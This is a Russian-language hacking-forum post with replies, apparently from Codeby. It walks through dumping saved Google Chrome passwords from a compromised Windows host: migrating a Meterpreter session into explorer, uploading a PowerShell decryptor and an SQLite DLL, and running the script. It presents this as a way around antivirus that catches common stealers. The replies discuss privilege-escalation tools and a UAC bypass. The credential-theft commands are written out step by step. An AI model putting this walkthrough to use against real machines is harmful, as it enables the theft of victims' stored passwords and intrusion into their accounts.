Dump Chrome Passwords

Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа LaZagne убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но нет надежных людей. При конвертировании питоновских файлов какие-то ошибки. Все бесит, нервы сдают, но выход есть всегда и сегодня - это изъятия пассов с помощью powershell скрипта.

Статья написана в дополнении к этой статье.
Инструмент предназначен для дампа паролей из ОС Windows, Browser Google Chrome

Атакующая машина : Kali linux 2017.3
Атакуемая машина : Windows Server 2012 R2 (EN)

Источник: https://github.com/p0z/CPD

Что нужно ?
1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер

upload_2017-11-29_3-25-56.png



2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.

Migrate:

Код:
pgrep explorer
pid - ваш explorer
migrate pid

Создание каталога:

Код:
mkdir Pass
cd Pass

Загрузка файлов в созданный каталог (test):

Код:
upload путь к файлу на диске

upload /root/CPD/Chrome_Passwords_Decryptor.ps1
upload /root/CPD/System.Data.SQLite.dll

PZLP0MxxRJU.jpg



upload_2017-11-29_3-50-11.png


3. Потереть ручки и выполнить следующую команду:

Код:
powershell -file Chrome_Passwords_Decryptor.ps1


Отлично, на выходе получаем вот это :
upload_2017-11-29_3-44-42.png


Prof1t!

P.S. Если не мигрировать, то пассов Вам не видать.

5WZQRyiSif0.jpg




Я бы даже выделил следующие преимущества:
  1. Просто в исполнении.
  2. Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
  3. Не требует закрытие процесса Хром в отличии от модуля в Empire.
P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!

Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч !
 

Вложения

  • upload_2017-11-29_3-40-15.png
    upload_2017-11-29_3-40-15.png
    40,2 КБ · Просмотры: 798
Последнее редактирование модератором:
Последнее редактирование модератором:
Okey, пробовал с помощью DeathStar-master поднять привилегии ? Или

Или Sherlock-master

Или




- Сейчас попробую , отпишусь по результату.
[doublepost=1513264127,1513184743][/doublepost]
- Сейчас попробую , отпишусь по результату.

---------

Экспериментировал с DeathStar-master : ситуация следующая - при вызове ланстера DeathStar-master , выдает ошибки
Насколько я понял DeathStar-master работает исключительно с пользователями AD ( ну не факт ) .
Любая ошибка напрягает, как бы начинает выводить агента - потом ошибки наворачиваются

upload_2017-12-14_18-6-28.png



enigma_fileless_uac_bypass - privilege escalation -
Enigma - поднимает 2 -ую сессию , но привилегии не меняет . Эксплойт не отрабатывает

Прбывал с Winpayloads , но тоже ошибки , что-то с импортированием модулей
 

Вложения

  • upload_2017-12-14_18-0-6.png
    upload_2017-12-14_18-0-6.png
    76,5 КБ · Просмотры: 282
Последнее редактирование:
- Автор ., Как Вам удалось вывести инфу по длине во весь экран ( так ,как на скрине ) . Идет постоянно обрезано
 

Вложения

  • 0000.jpg
    0000.jpg
    73,7 КБ · Просмотры: 278
Сделал сначала его потом enum_chrome пассы отличались и в последнем случае пароли рабочие.
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab